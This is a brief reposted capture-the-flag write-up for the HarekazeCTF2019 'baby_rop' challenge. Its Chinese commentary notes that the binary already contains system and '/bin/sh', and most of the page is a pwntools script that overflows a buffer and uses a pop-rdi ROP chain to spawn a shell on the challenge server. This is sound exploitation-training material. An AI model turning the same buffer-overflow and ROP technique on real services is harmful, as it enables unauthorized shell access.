[HarekazeCTF2019]baby_rop
Posted gaonuoqi
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[HarekazeCTF2019]baby_rop相关的知识,希望对你有一定的参考价值。
程序已经给了system和binsh ,用寄存器传参就可以了
from pwn import * r=remote(‘node3.buuoj.cn‘,25737) elf=ELF(‘./babyrop‘) system_addr=elf.symbols[‘system‘] binsh_addr=0x601048 rdi_addr=0x400683 payload=‘a‘*0x10+‘b‘*0x8+p64(rdi_addr)+p64(binsh_addr)+p64(system_addr)+p64(0xdeadbeef) #system(/bin/sh) r.sendline(payload) r.interactive()
以上是关于[HarekazeCTF2019]baby_rop的主要内容,如果未能解决你的问题,请参考以下文章